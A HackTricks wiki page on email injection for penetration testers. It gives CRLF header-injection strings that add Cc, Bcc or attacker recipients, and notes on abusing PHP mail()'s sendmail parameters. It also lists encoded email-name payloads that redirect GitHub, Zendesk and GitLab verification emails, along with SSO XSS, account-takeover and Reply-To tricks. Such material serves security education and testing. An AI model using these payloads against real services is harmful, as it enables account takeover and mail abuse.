mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 21:53:54 +00:00
249 lines
12 KiB
Markdown
249 lines
12 KiB
Markdown
# Email Injections
|
||
|
||
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||
Get Access Today:
|
||
|
||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
## Inject in sent e-mail
|
||
|
||
### Inject Cc and Bcc after sender argument
|
||
|
||
```
|
||
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
|
||
```
|
||
|
||
The message will be sent to the recipient and recipient1 accounts.
|
||
|
||
### Inject argument
|
||
|
||
```
|
||
From:sender@domain.com%0ATo:attacker@domain.com
|
||
```
|
||
|
||
The message will be sent to the original recipient and the attacker account.
|
||
|
||
### Inject Subject argument
|
||
|
||
```
|
||
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
|
||
```
|
||
|
||
The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.
|
||
|
||
### Change the body of the message
|
||
|
||
Inject a two-line feed, then write your message to change the body of the message.
|
||
|
||
```
|
||
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
|
||
```
|
||
|
||
### PHP mail() function exploitation
|
||
|
||
```bash
|
||
# The function has the following definition:
|
||
|
||
php --rf mail
|
||
|
||
Function [ <internal:standard> function mail ] {
|
||
- Parameters [5] {
|
||
Parameter #0 [ <required> $to ]
|
||
Parameter #1 [ <required> $subject ]
|
||
Parameter #2 [ <required> $message ]
|
||
Parameter #3 [ <optional> $additional_headers ]
|
||
Parameter #4 [ <optional> $additional_parameters ]
|
||
}
|
||
}
|
||
```
|
||
|
||
#### The 5th parameter ($additional\_parameters)
|
||
|
||
This section is going to be based on **how to abuse this parameter supposing that an attacker controls it**.
|
||
|
||
This parameter is going to be added to the command line PHP will be using to invoke the binary sendmail. However, it will be sanitised with the function `escapeshellcmd($additional_parameters)`.
|
||
|
||
An attacker can **inject extract parameters for sendmail** in this case.
|
||
|
||
#### Differences in the implementation of /usr/sbin/sendmail
|
||
|
||
**sendmail** interface is **provided by the MTA email software** (Sendmail, Postfix, Exim etc.) installed on the system. Although the **basic functionality** (such as -t -i -f parameters) remains the **same** for compatibility reasons, **other functions and parameters** vary greatly depending on the MTA installed.
|
||
|
||
Here are a few examples of different man pages of sendmail command/interface:
|
||
|
||
* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
|
||
* Postfix MTA: http://www.postfix.org/mailq.1.html
|
||
* Exim MTA: https://linux.die.net/man/8/eximReferences
|
||
|
||
Depending on the **origin of the sendmail** binary different options have been discovered to abuse them and l**eak files or even execute arbitrary commands**. Check how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
|
||
|
||
## Inject in the e-mail name
|
||
|
||
{% hint style="danger" %}
|
||
Note that if you manage to create an account in a service with an arbitrary domain name (like Github, Gitlab, CloudFlare Zero trust...) and verify it receiving the verification email in your mail address, you might be able to access sensitive locations of the victim company
|
||
{% endhint %}
|
||
|
||
### Ignored parts of an email
|
||
|
||
The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers
|
||
|
||
* E.g. john.doe+intigriti@example.com → john.doe@example.com
|
||
|
||
**Comments between parentheses ()** at the beginning or the end will also be ignored
|
||
|
||
* E.g. john.doe(intigriti)@example.com → john.doe@example.com
|
||
|
||
### Whitelist bypass
|
||
|
||
<figure><img src="../.gitbook/assets/image (812).png" alt="https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
|
||
|
||
### Quotes
|
||
|
||
<figure><img src="../.gitbook/assets/image (626).png" alt="https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0"><figcaption></figcaption></figure>
|
||
|
||
### IPs
|
||
|
||
You can also use IPs as domain named between square brackets:
|
||
|
||
* john.doe@\[127.0.0.1]
|
||
* john.doe@\[IPv6:2001:db8::1]
|
||
|
||
### Email Encoding
|
||
|
||
As explained in [**this research**](https://portswigger.net/research/splitting-the-email-atom), email names also can also contain encoded characters:
|
||
|
||
* **PHP 256 overflow**: PHP `chr` function will continue adding 256 to a char until it becames positive and then do the operation `%256`.
|
||
* `String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @`
|
||
|
||
{% hint style="success" %}
|
||
The goal of this trick is to end with an injection like `RCPT TO:<"collab@psres.net>collab"@example.com>`\
|
||
that will send the verification email to a different email address from the expected one (therefore to introduce another email address inside the email name and break the syntax when sending the email)
|
||
{% endhint %}
|
||
|
||
Different encodings:
|
||
|
||
```bash
|
||
# Format
|
||
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com
|
||
|
||
# =? -> Start of encode
|
||
# utf-8 -> encoding used
|
||
# ? -> separator
|
||
# q -> type of encoding
|
||
# ? -> separator
|
||
# =41=42=43 -> Hex encoded data
|
||
# ?= end of encoding
|
||
|
||
# Other encodings, same example:
|
||
# iso-8859-1
|
||
=?iso-8859-1?q?=61=62=63?=hi@example.com
|
||
# utf-8
|
||
=?utf-8?q?=61=62=63?=hi@example.com
|
||
# utf-7
|
||
=?utf-7?q?<utf-7 encoded string>?=hi@example.com
|
||
# q encoding + utf-7
|
||
=?utf-7?q?&=41<utf-7 encoded string without initial A>?=hi@example.com
|
||
# base64
|
||
=?utf-8?b?QUJD?=hi@example.com
|
||
# bas64 + utf-7
|
||
=?utf-7?q?<utf-7 encoded string in base64>?=hi@example.com
|
||
#punycode
|
||
x@xn--svg/-9x6 → x@<svg/
|
||
```
|
||
|
||
Payloads:
|
||
|
||
* Github: `=?x?q?collab=40psres.net=3e=00?=foo@example.com`
|
||
* Note the encoded `@` as =40, the encoded `>` as `=3e` and `null` as `=00` 
|
||
* It'll send the verification email to `collab@psres.net`
|
||
* Zendesk: `"=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com`
|
||
* Same trick as before but adding some regular quote at the beginning and encoded qoute `=22` before the encoded `@` and then starting and close some qoutes before the next email to fix the syntax used internally by Zendesk
|
||
* It'll send the verification email to `collab@psres.net`
|
||
* Gitlab: `=?x?q?collab=40psres.net_?=foo@example.com`
|
||
* Note the use of the underscore as a space to separate address
|
||
* It'll send the verification email to `collab@psres.net`
|
||
* Punycode: Using Punycode it was possible to inject a tag `<style` in Joomla and abuse it to steal the CSRF token via CSS exfiltration.
|
||
|
||
#### Tooling
|
||
|
||
* There is a **Burp Suite Turbo Intruder script** to fuzz these kind of combinations to try to attack email formats. The script already have potentially working combinations.
|
||
* It's laso possible to use [Hackvertor](https://portswigger.net/bappstore/65033cbd2c344fbabe57ac060b5dd100) to create an email splitting attack
|
||
|
||
### Other vulns
|
||
|
||
![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)
|
||
|
||
## Third party SSO
|
||
|
||
### XSS
|
||
|
||
Some services like **github** or **salesforce allows** you to create an **email address with XSS payloads on it**. If you can **use this providers to login on other services** and this services **aren't sanitising** correctly the email, you could cause **XSS**.
|
||
|
||
### Account-Takeover
|
||
|
||
If a **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and then you can use that account to **login in a different service** that **trusts** salesforce, you could access any account.\
|
||
_Note that salesforce indicates if the given email was or not verified but so the application should take into account this info._
|
||
|
||
## Reply-To
|
||
|
||
You can send an email using _**From: company.com**_ and _**Replay-To: attacker.com**_ and if any **automatic reply** is sent due to the email was sent **from** an **internal address** the **attacker** may be able to **receive** that **response**.
|
||
|
||
## Hard Bounce Rate
|
||
|
||
Certain services, like AWS, implement a threshold known as the **Hard Bounce Rate**, typically set at 10%. This is a critical metric, especially for email delivery services. When this rate is exceeded, the service, such as AWS's email service, may be suspended or blocked.
|
||
|
||
A **hard bounce** refers to an **email** that has been returned to the sender because the recipient's address is invalid or non-existent. This could occur due to various reasons, such as the **email** being sent to a non-existing address, a domain that isn't real, or the recipient server's refusal to accept **emails**.
|
||
|
||
In the context of AWS, if you send 1000 emails and 100 of them result in hard bounces (due to reasons like invalid addresses or domains), this would mean a 10% hard bounce rate. Reaching or exceeding this rate can trigger AWS SES (Simple Email Service) to block or suspend your email sending capabilities.
|
||
|
||
It's crucial to maintain a low hard bounce rate to ensure uninterrupted email service and maintain sender reputation. Monitoring and managing the quality of the email addresses in your mailing lists can significantly help in achieving this.
|
||
|
||
For more detailed information, AWS's official documentation on handling bounces and complaints can be referred to [AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types).
|
||
|
||
## References
|
||
|
||
* [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)
|
||
* [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
|
||
* [https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
|
||
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||
Get Access Today:
|
||
|
||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|